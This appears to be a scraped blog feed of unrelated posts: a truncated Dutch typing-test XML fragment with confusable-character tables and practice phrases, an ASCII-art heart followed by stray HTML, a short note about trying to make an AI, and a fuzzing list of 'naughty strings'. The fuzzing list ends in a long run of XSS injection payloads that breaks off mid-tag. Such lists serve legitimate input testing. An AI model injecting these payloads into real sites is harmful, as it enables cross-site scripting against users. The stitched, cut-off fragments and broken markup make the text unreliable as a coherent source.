confusables=“èëeê”/><symbol id=“è” confusables=“éêëe”/><symbol id=“ê” confusables=“èéeë”/><symbol id=“ë” confusables=“èéïê”/><symbol id=“f” confusables=“tFG£”/><symbol id=“g” confusables=“9Gqy”/><symbol id=“h” confusables=“knbL”/><symbol id=“i” confusables=“íIïj”/><symbol id=“í” confusables=“ÍiïI”/><symbol id=“î” confusables=“ÎiïT”/><symbol id=“ï” confusables=“Ïi"í”/><symbol id=“j” confusables=“Ji;I”/><symbol id=“k” confusables=“Kh4t”/><symbol id=“l” confusables=“I1L(”/><symbol id=“m” confusables=“MnNw”/><symbol id=“n” confusables=“Nmhu”/><symbol id=“o” confusables=“0O°ó”/><symbol id=“ó” confusables=“ÓöoÖ”/><symbol id=“ö” confusables=“Ö°óä”/><symbol id=“p” confusables=“P1rB”/><symbol id=“q” confusables=“g9QG”/><symbol id=“r” confusables=“vznV”/><symbol id=“s” confusables=“S5g9”/><symbol id=“t” confusables=“E+£T”/><symbol id=“u” confusables=“U4na”/><symbol id=“ú” confusables=“Úüûá”/><symbol id=“û” confusables=“Ûúüâ”/><symbol id=“ü” confusables=“Üäûú”/><symbol id=“v” confusables=“VurU”/><symbol id=“w” confusables=“Wunv”/><symbol id=“x” confusables=“X*t+”/><symbol id=“y” confusables=“Y4xJ”/><symbol id=“z” confusables=“Z2ra”/><symbol id=“0” confusables=“oO°d”/><symbol id=“1” confusables=“Il’/”/><symbol id=“2” confusables=“zZr1”/><symbol id=“3” confusables=“J}sI”/><symbol id=“4” confusables=“uyUY”/><symbol id=“5” confusables=“sSJg”/><symbol id=“6” confusables=“Gbtf”/><symbol id=“7” confusables=“Jf1Z”/><symbol id=“8” confusables=“P°o±”/><symbol id=“9” confusables=“gqGy”/><symbol id=“_” confusables=“-.=~”/><symbol id=“-” confusables=“.~rn”/><symbol id=“(” confusables=“lCcL”/><symbol id=“[” confusables=“C(Ec”/><symbol id=“{” confusables=“E[lL”/><symbol id=“„” confusables=“"1±,”/><symbol id=“)” confusables=“J]I,”/><symbol id=“]” confusables=“JI3,”/><symbol id=“}” confusables=“3J,I”/><symbol id=“’” confusables=“,1.I”/><symbol id=“!” confusables=“l?tf”/><symbol id=“”“ confusables="„1±,”/><symbol id=“#” confusables=“*¥Ht”/><symbol id=“%” confusables=“o09q”/><symbol id=“&” confusables=“*R8r”/><symbol id=“*” confusables=“#A¥t”/><symbol id=“,” confusables=“’.1J”/><symbol id=“.” confusables=“-’;á”/><symbol id=“/” confusables=“1lI’”/><symbol id=“:” confusables=“;.’!”/><symbol id=“;” confusables=“:ij±”/><symbol id=“?” confusables=“!721”/><symbol id=“@” confusables=“aQde”/><symbol id=“" confusables="l1I’”/><symbol id=“~” confusables=“nr-v”/><symbol id=“+” confusables=“tT±*”/><symbol id=“<” confusables=“cClL”/><symbol id=“=” confusables=“±<ex”/><symbol id=“>” confusables=“7,s)”/><symbol id=“±” confusables=“I¥€F”/><symbol id=“$” confusables=“§BsD”/><symbol id=“£” confusables=“Ef€t”/><symbol id=“¥” confusables=“EI±#”/><symbol id=“€” confusables=“E£et”/><symbol id=“§” confusables=“$çs5”/><symbol id=“°” confusables=“o0O.”/><phraseCue>Schrijf de zin hierboven eenmaal over.</phraseCue><phraseSet id=“PhraseSet1”><phrase>76% Van de studenten is geslaagd; 14% is gezakt.</phrase><phrase>“Kóm hier! Nú!” riep Yvonne naar haar zoon Zeno.</phrase><phrase>Mijn telefoonnummer is: 020 - 526 55 87.</phrase><phrase>Ik ben geboren te ’s-Gravenhage op 25/04/1973.</phrase><phrase>Wachtwoorden met een *,{,},\,[ of ] zijn ongeldig.</phrase><phrase>Welkom bij ING: Je wachtwoord is *Eylül~Göx*.</phrase><phrase>Haar website is http://www.ELIZABETH~BISCHOF.com.</phrase><phrase>Ivo wist niet dat Zoë en Ines zussen zijn.</phrase><phrase>Mijn e-mailadres is Maartje@Möllen_Krüllern.nl.</phrase><phrase>Île-de-France betekent Eiland van Frankrijk?</phrase><phrase>Mijn adres is Ieperlaan 84, 5233 RH ’s-Hertogenbosch.</phrase><phrase>Rijen Q->U en W->X voor het Lütfü concert zijn vol.</phrase><phrase>De meester noteerde: 5+8 < 9+8 > 6+1.</phrase><phrase>Café en enquête zijn vernederlandste Franse woorden.</phrase><phrase>De bankier noteerde: € 1 = $ 1,5877 = ¥ 168,97.</phrase><phrase>Het symbool voor de Japanse yen is '¥’.</phrase><phrase>In 2001 boekte hij een 6% winst van £ 800.000.</phrase><phrase>De Britse £ versterkt, maar de Amerikaanse $ verzwakt.</phrase><phrase>Vóór ons coördinatiegesprek was Max nog in orde.</phrase><phrase>De geïmproviseerde trip naar Ethiopië was vreselijk.</phrase><phrase>“SCHUIF AAN IN DEZE RIJ A.U.B.,” schreef Hélène.</phrase><phrase>Tom las de 6 laatste letters van het alfabet: 'UVWXYZ’.</phrase><phrase>“Waarom is Adèle niet geïnteresseerd?” schreef Pol.</phrase><phrase>Ik heb maar een páár koekjes; ik wil een héle zak!</phrase><phrase>De letters à, â, ç en ê komen veel voor in het Frans.</phrase><phrase>“Onze financiële situatie is een rámp!” riep Lea.</phrase><phrase>De kaart kost £ 4. Kan je me £ 1 lenen? </phrase><phrase>De geïmporteerde crème uit Bäretswil kost € 4.</phrase><phrase>“Zít!” riepen Xander en Adelaïde samen.</phrase><phrase>Gaan Benoît en François deze zomer naar Alstätten?</phrase><phrase>De code voor de voordeur is: [#TUK&VO_PUQ&CY].</phrase><phrase>Het symbool ’@’ noemt men een apenstaartje.</phrase><phrase>Stuur het naar haar e-mailadres: Píx_Tà[email protected].</phrase><phrase>5° Celsius is ± 41° Fahrenheit.</phrase><phrase>€ 5 is tegenwoordig ± $ 8 of ± ¥ 845 waard.</phrase><phrase>De 'tilde’ of ’~’ wordt vaak gebruikt in computertaal.</phrase><phrase>Is dit correct: (5+3) < (8-2) en (6-1) < (8+9) ?</phrase><phrase>De 'backslash’ is de benaming voor het leesteken ’'.</phrase><phrase>Het document is opgeslagen onder C:\Mijn documenten\Jo.</phrase><phrase>Volgende tekens noemt men 'haakjes’: ( ), [ ], { }.</phrase><phrase>'Château’ is het Franse woord voor 'kasteel’.</phrase><phrase>“Búk je!” riep Dominique.</phrase><phrase>Jacob is alleen; zijn vrouw heeft hem verlaten.</phrase><phrase>Een verzoek aan Vera & Bulkjens is in behandeling.</phrase><phrase>De leerkracht fysica noteerde: 5°C = …°F?</phrase><phrase>De accolades { en } noemt men ook gekrulde haakjes. </phrase><phrase>Mijn mama’s telefoonnummer is: 0569 349 998.</phrase><phrase>'ALLES = € 1’ staat in het groot op zijn winkel.</phrase><phrase>Dag Annie, alles goed met je?</phrase><phrase>Bas is een echte grapjas.</phrase></phraseSet><phraseSet id=“PhraseSet2”><phrase>Sla het bestand a.u.b. op onder C:\QUOT_INFO_3~8\fin.</phrase><phrase>“Zít! Nú!” riep Noël naar zijn hond Rémy.</phrase><phrase>39,5 °C komt overeen met ± 103°F.</phrase><phrase>Hij bezit ± € 70.583; dat is ± ¥ 7.532.952.</phrase><phrase>Dit was de examenvraag: (5x9) + (7-3) + (40/4) = …? </phrase><phrase>'GELIEVE TE WACHTEN’ stond er op het bord. </phrase><phrase>Quinten is eenzaam; Simone heeft hem verlaten.</phrase><phrase>Iedereen is welkom; ik hoop echter dat Jan wegblijft.</phrase><phrase>Blokhaakjes zien er als volgt uit: [ en ].</phrase><phrase>Zijn Gökce en Ergüvenç afkomstig uit Turkije?</phrase><phrase>Toets a.u.b. volgende code in: [*ä&î~~êâ4*].</phrase><phrase>François wordt dit jaar tweeënveertig.</phrase><phrase>Op het eind van mijn carrière verdiende ik $ 175.664. </phrase><phrase>“Móói! Zeg nu eens, gelooft Thérèse echt in elfen?” </phrase><phrase>Aïda weegt maar 54,2 kg.; ideaal voor een mannequin.</phrase><phrase>Er zijn veel 16- en 17-jarige cocaïneverslaafden.</phrase><phrase>Dit is volgens Jean-Pièrre geïmiteerde Leidse klei.</phrase><phrase>Faeröer spreek je als volgt uit: [fêêr-eu-er].</phrase><phrase>Bäretswil is een dorpje in het Zwitserse kanton Zürich.</phrase><phrase>“Nou, dá’s straf! $ 40 is níks!” riep José uit.</phrase><phrase>Hij legde uit: “Als 8+9 > 5-1 dan is 5-1 < 8+9.”</phrase><phrase>Hélène heeft € 1.337,50 geïnvesteerd; dat is $ 2.116,37.</phrase><phrase>“Noemt men ( ), [ ], { } en < > haakjes?” vroeg ze.</phrase><phrase>Aimé en Eugène hebben één e-mailadres: [email protected].</phrase><phrase>“Húp, húp, dánsen!” zong Benoît uit volle borst.</phrase><phrase>De website van Yvo’s zaak is http://Château_St_Miq.com.</phrase><phrase>'GEEN VUURWAPENS A.U.B’ staat er op de deur.</phrase><phrase>Xander en Yvonne Lootens wonen in ’s-Gravenhage.</phrase><phrase>H&M boekte in 2007 15% winst (ongeveer € 69.000).</phrase><phrase>Karoline Van Wanten is qua uiterlijk perfect.</phrase><phrase>“Dat is ídeaal!” riepen Max en Yolanda.</phrase><phrase>De Engelsman gaf me slechts £ 1 i.p.v. £ 2 terug.</phrase><phrase>£ 1 is momenteel ¥ 211,463 waard.</phrase><phrase>Neem minstens ¥ 7.532 mee voor je trip naar Japan.</phrase><phrase>Het was snikheet in Qatar, ongeveer 40°C.</phrase><phrase>Robs adres is: 4500 Aqualaan 2X, 3583 Paal.</phrase><phrase>Een e-mailadres bevat steeds volgend teken:’@’.</phrase><phrase>Zoek het document onder D:\K&U{123}K&X{123}\yvo.</phrase><phrase>“C'est à moi, pas à toi,” schreef ze in het Frans.</phrase><phrase>“Een aquaduct is een brug,” schreef de leerling.</phrase><phrase>“5+5=10,” legde hij zijn dochter uit.</phrase><phrase>De V&D kende een verlies van 5,6%.</phrase><phrase>De nummers 3 t/m 27 mogen binnenkomen.</phrase><phrase>Is dit correct: 5% van 100 > 2% van 200? </phrase><phrase>Stuur een e-mail naar “[email protected]” zei hij.</phrase><phrase>Deze groep gaat naar Rome.</phrase><phrase>Zijn dochter is getrouwd met Rob Boschuyt.</phrase><phrase>Wie komt jou afhalen vanavond?</phrase><phrase>“Als 7+3=10, dan is 10-7=3” zei de j
1 note
·
View note
Text
Love?
;@@@@@@@@@@@i 8@@@@@@@@@@t .@@@@@@@@@@@t G@@@@@@@@@@@L 0@@@@@@@@@@t f@@@@@@@@@@@@C L@@@@@@@@@@L 1@@@@@@@@@@@@@0 t@@@@@@@@@@L :@@@@@@@@@@@@@@@ ;@@@@@@@@@@C .8@@@@@@@@@@@@@@@, ,@@@@@@@@@@G G@@@@@@@t@@@@@@@@; 8@@@@@@@@@0 f@@@@@@@L 8@@@@@@@i C@@@@@@@@@@ 1@@@@@@@G C@@@@@@@t 1 f@@@@@@@@@@ :@@@@@@@8 L@@@@@@@L :@ i@@@@@@@@@@, .@@@@@@@@, t@@@@@@@C 8@ ,@@@@@@@@@@, 0@@@@@@@; i@@@@@@@0 G@@ @@@@@@@@@@; L@@@@@@@1 ,@@@@@@@@ t@@@ G@@@@@@@@@; 1@@@@@@@L @@@@@@@@, ;@@@@ L@@@@@@@@@i :@@@@@@@G 0@@@@@@@; .@@@@@ 1@@@@@@@@@i .@@@@@@@8 C@@@@@@@i 0@@@@@ ;@@@@@@@@@t 0@@@@@@@, f@@@@@@@t L@@@@@@ .@@@@@@@@@t L@@@@@@@; 1@@@@@@@L i@@@@@@@ 0@@@@@@@@L 1@@@@@@@1 ;@@@@@@@G ,@@@@@@@@ L@@@@@@@@L ;@@@@@@@L ,@@@@@@@0 8@@@@@@@@ t@@@@@@@@C.@@@@@@@G @@@@@@@@ C@@@@@@@@f ;@@@@@@@@G0@@@@@@8 0@@@@@@@L@@@@@@@@C ,@@@@@@@@@@@@@@@@, C@@@@@@@@@@@@@@@G 8@@@@@@@@@@@@@@; t@@@@@@@@@@@@@@0 C@@@@@@@@@@@@@t i@@@@@@@@@@@@@8. f@@@@@@@@@@@@L ;@@@@@@@@@@@@@, i@@@@@@@@@@@G ,@@@@@@@@@@@@: ,@@@@@@@@@@8 8@@@@@@@@@@;
Love, = Wantering
Wantering = Wondering = Secret = Hoping = Wanting = Aspiring Multiplied by Performing, http://www.wantering.com
--> <!--[if lt IE 7]><html class="lt-ie10 lt-ie9 lt-ie8 lt-ie7"><![endif]--> <!--[if IE 7]><html class="lt-ie10 lt-ie9 lt-ie8"><![endif]--> <!--[if IE 8]><html class="lt-ie10 lt-ie9"> <![endif]--> <!--[if IE 9]><html class="lt-ie10"> <![endif]--> <!--[if gt IE 9]><!--> <html class="no-js"> <!--<![endif]--> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# blog: http://ogp.me/ns/blog#">
0 notes
Text
Explanation
So a while back I was messing around on the computer, and I wanted to make an AI. A whole bunch happened but this is what I’ve got. I did not write any of it..
1 note
·
View note
Text
# Reserved Strings # # Strings which may be used elsewhere in code
undefined undef null NULL (null) nil NIL true false True False None \ \\
# Numeric Strings # # Strings which can be interpreted as numeric
0 1 1.00 $1.00 1/2 1E2 1E02 1E+02 -1 -1.00 -$1.00 -1/2 -1E2 -1E02 -1E+02 1/0 0/0 -2147483648/-1 -9223372036854775808/-1 0.00 0..0 . 0.0.0 0,00 0,,0 , 0,0,0 0.0/0 1.0/0.0 0.0/0.0 1,0/0,0 0,0/0,0 --1 - -. -, 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 NaN Infinity -Infinity INF 1#INF -1#IND 1#QNAN 1#SNAN 1#IND 0x0 0xffffffff 0xffffffffffffffff 0xabad1dea 123456789012345678901234567890123456789 1,000.00 1 000.00 1'000.00 1,000,000.00 1 000 000.00 1'000'000.00 1.000,00 1 000,00 1'000,00 1.000.000,00 1 000 000,00 1'000'000,00 01000 08 09 2.2250738585072011e-308
# Special Characters # # Strings which contain common special ASCII characters (may need to be escaped)
,./;'[]\-= <>?:"{}|_+ !@#$%^&*()`~
# Unicode Symbols # # Strings which contain common unicode symbols (e.g. smart quotes)
Ω≈ç√∫˜µ≤≥÷ åß∂ƒ©˙∆˚¬…æ œ∑´®†¥¨ˆøπ“‘ ¡™£¢∞§¶•ªº–≠ ¸˛Ç◊ı˜Â¯˘¿ ÅÍÎÏ˝ÓÔÒÚÆ☃ Œ„´‰ˇÁ¨ˆØ∏”’ `⁄€‹›fifl‡°·‚—± ⅛⅜⅝⅞ ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя ٠١٢٣٤٥٦٧٨٩
# Unicode Subscript/Superscript # # Strings which contain unicode subscripts/superscripts; can cause rendering issues
⁰⁴⁵ ₀₁₂ ⁰⁴⁵₀₁₂
# Quotation Marks # # Strings which contain misplaced quotation marks; can cause encoding errors
' " '' "" '"' "''''"'" "'"'"''''" <foo val=“bar” /> <foo val=“bar” /> <foo val=”bar“ /> <foo val=`bar' />
# Two-Byte Characters # # Strings which contain two-byte characters: can cause rendering issues or character-length issues
“c’†‚³‚ٌ‚ة‚ ‚°‚ؤ‰؛‚³‚¢ ƒpپ[ƒeƒBپ[‚ضچs‚©‚ب‚¢‚© کaگ»ٹ؟Œê •”—ژٹi »çب¸°ْاذ؟ّ ¾îاذ؟¬±¸¼ز ھBآ÷¸¦ إ¸°ي ؟آ ¼„½أ¸ا°ْ œ؛´ظ¸® Œc¹و°¢اد قنüهخ،ùتêآهقùت研د¼ل¶ ؟ï¶ُ¹ظإن¸£ 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
# Japanese Emoticons # # Strings which consists of Japanese-style emoticons which are popular on the web
پR༼ຈل͜ຈ༽ة پR༼ຈل͜ຈ༽ة (،◕ پح ◕،) پM¨(´∀پMپ؟ __غ(,_,*) پE(پPپحپP)پE:*: ك¥✿پS╲(،◕‿◕،)╱✿¥ك ,پBپE:*:پEپK’( ☻ ω ☻ )پBپE:*:پEپK’ (╯°□°)╯︵ ┻━┻) (ةಥ‰vಥپjة „³„ھ„³ ( ͡° ͜ʖ ͡°)
# Emoji # # Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
😍 👩🏽 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 🐵 🙈 🙉 🙊 ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
# Unicode Numbers # # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
123 ١٢٣
# Right-To-Left Strings # # Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ הָיְתָהtestالصفحات التّحول ﷽ ﷺ
# Unicode Spaces # # Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html)
،، ␣ ␢ ␡
# Trick Unicode # # Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
test test
test
testtest test
# Zalgo Text # # Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔ل̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
# Unicode Upsidedown # # Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com)
ےɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ 00ےƖ$-
# Unicode font # # Strings which contain bold/italic/etc. versions of normal characters
£ش£è£ه £ٌ£ُ£é£م£ë £â£ٍ£ï£÷£î £و£ï£ّ £ê£ُ£ي£ً£َ £ï£ِ£ه£ٍ £ô£è£ه £ى£ل£ْ£ù £ن£ï£ç 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 ⒯⒣⒠ ©ف©ل©ص©د©× ©خ©ق©غ©م©ع ©ز©غ©ن ©ض©ل©ظ©ـ©ك ©غ©â©ر©ق ©à©ش©ر ©ط©ح©و©ه ©ذ©غ©س
# Script Injection # # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
<script>alert(123)</script> <script>alert('123');</script> <img src=x onerror=alert(123) /> <svg><script>123<1>alert(123)</script> "><script>alert(123)</script> '><script>alert(123)</script> ><script>alert(123)</script> </script><script>alert(123)</script> < / script >< script >alert(123)< / script > onfocus=JaVaSCript:alert(123) autofocus " onfocus=JaVaSCript:alert(123) autofocus ' onfocus=JaVaSCript:alert(123) autofocus £¼script£¾alert(123)£¼/script£¾ <sc<script>ript>alert(123)</sc</script>ript> --><script>alert(123)</script> ";alert(123);t=" ';alert(123);t=' JavaSCript:alert(123) ;alert(123); src=JaVaSCript:prompt(132) "><script>alert(123);</script x=" '><script>alert(123);</script x=' ><script>alert(123);</script x= " autofocus onkeyup="javascript:alert(123) ' autofocus onkeyup='javascript:alert(123) <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a 